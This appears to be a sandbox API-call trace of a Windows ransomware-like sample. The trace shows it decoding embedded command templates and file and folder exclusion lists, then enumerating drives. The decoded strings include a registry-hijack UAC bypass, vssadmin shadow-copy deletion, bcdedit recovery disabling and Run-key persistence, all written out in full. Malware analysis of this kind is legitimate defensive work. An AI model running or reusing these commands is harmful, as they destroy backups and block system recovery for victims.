lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x138500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0100.882] GetCurrentThreadId () returned 0xc44 [0100.882] GetCurrentThreadId () returned 0xc44 [0100.882] GetCurrentThreadId () returned 0xc44 [0100.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1340e48, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0100.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1340e48, cbMultiByte=1410, lpWideCharStr=0x133accc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0100.883] GetCurrentThreadId () returned 0xc44 [0100.883] GetCurrentThreadId () returned 0xc44 [0100.883] GetCurrentThreadId () returned 0xc44 [0100.883] GetCurrentThread () returned 0xfffffffe [0100.883] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0100.883] GetLastError () returned 0x3f0 [0100.883] GetCurrentProcess () returned 0xffffffff [0100.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0100.883] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x133ee10, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x133ee10, ReturnLength=0x12fc60) returned 1 [0100.883] CloseHandle (hObject=0xb8) returned 1 [0100.883] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x2364d0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0100.883] EqualSid (pSid1=0x2364d0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x133ee74*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0100.883] EqualSid (pSid1=0x2364d0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x133ee90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0100.883] EqualSid (pSid1=0x2364d0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x133ee9c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0100.883] GetCurrentProcess () returned 0xffffffff [0100.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0100.883] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0100.883] GetLastError () returned 0x7a [0100.883] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x237770 [0100.883] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x237770, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x237770, ReturnLength=0x12fc64) returned 1 [0100.883] GetSidSubAuthorityCount (pSid=0x237778*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x237779 [0100.883] GetSidSubAuthority (pSid=0x237778*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x237780 [0100.883] LocalFree (hMem=0x237770) returned 0x0 [0100.883] CloseHandle (hObject=0xb8) returned 1 [0100.883] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0100.883] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0100.886] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0100.886] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.886] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0100.886] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0100.886] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0100.886] LockResource (hResData=0x516824) returned 0x516824 [0100.886] FreeResource (hResData=0x516824) returned 0 [0100.886] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0100.886] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0100.886] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0100.886] LockResource (hResData=0x50d64c) returned 0x50d64c [0100.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1385008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0100.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1385008, cbMultiByte=38, lpWideCharStr=0x137deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0100.886] FreeResource (hResData=0x50d64c) returned 0 [0100.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x138500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0100.886] GetCurrentThreadId () returned 0xc44 [0100.886] GetCurrentThreadId () returned 0xc44 [0100.886] GetCurrentThreadId () returned 0xc44 [0100.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133ee18, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0100.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133ee18, cbMultiByte=615, lpWideCharStr=0x1344f7c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 